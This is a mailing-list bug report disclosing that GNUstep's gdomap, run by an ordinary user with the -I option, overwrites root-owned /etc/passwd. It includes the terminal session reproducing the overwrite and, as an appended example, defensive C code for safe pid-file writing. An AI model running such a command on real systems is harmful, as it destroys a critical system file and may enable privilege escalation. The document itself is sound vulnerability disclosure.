Can I please beg you to make gdomap run as a user other than root by default!?
I am using gnustep-base-1.3.3 compiled from source; running on RedHat Linux 7.3. Everything is default apart from using flattened paths in gnustep-make.

Today's problem:

--
[shykta@mixmaster shykta]$ id -a
uid=500(shykta) gid=100(users) groups=100(users),3(sys),20(games)
[shykta@mixmaster shykta]$ la /etc/passwd
-rw-r--r-- 1 root root 1592 Jul 2 19:15 /etc/passwd
[shykta@mixmaster shykta]$ tail -n 1 /etc/passwd
demouser:x:505:505::/home/demouser:/bin/bash
[shykta@mixmaster shykta]$ /usr/GNUstep/System/Tools/gdomap -I /etc/passwd
[shykta@mixmaster shykta]$ tail -n 1 /etc/passwd
28812
--

That's a very, very bad thing to happen. I'm sure there's even a creative way for an unprivileged user to get root access using this bug.

I don't want to sound unfriendly (I like GNUstep) but I'm going to wait 7 days for a response to this email, and if I haven't heard from you by then, I'll be thinking about how to disclose this. (à la RFPolicy - http://www.wiretrip.net/rfp/policy.html)

I apologise for the inconvenience!

James.

_______________________________________________
Bug-gnustep mailing list
[EMAIL PROTECTED]
http://mail.gnu.org/mailman/listinfo/bug-gnustep
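
In the session above, the path given to -I ends up holding a number although only root can write that file. As an added example (not part of the original message and not gdomap's code), here is one way a tool running with root's effective id can write a user-named pid file: open it with the invoking user's ids and refuse any path that already exists. The helper name, and the reading of the written number as a process id, are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper, not taken from gdomap: create the pid file with the
 * invoking user's own rights, and only if nothing exists at that path. */
int write_pidfile_as_caller(const char *path, pid_t pid)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, rc = -1;

    /* Take on the real (invoking) user's ids before touching the
     * filesystem: group first, while we are still allowed to change it. */
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        goto restore;

    /* O_EXCL: never truncate or reuse an existing file (or symlink).
     * O_NOFOLLOW: belt and braces against a link at the final component. */
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd >= 0) {
        rc = dprintf(fd, "%ld\n", (long)pid) > 0 ? 0 : -1;
        if (close(fd) != 0)
            rc = -1;
    }
restore:
    /* Regain the original effective ids for the privileged work that
     * follows; continuing in an unknown state would be worse than dying. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        abort();
    return rc;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s PIDFILE\n", argv[0]);
        return EXIT_FAILURE;
    }
    if (write_pidfile_as_caller(argv[1], getpid()) != 0) {
        fprintf(stderr, "%s: refusing to write pid file\n", argv[1]);
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;
}
```

With this open pattern the call in the session would fail: /etc/passwd already exists, and the invoking user could not have created it in /etc anyway.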
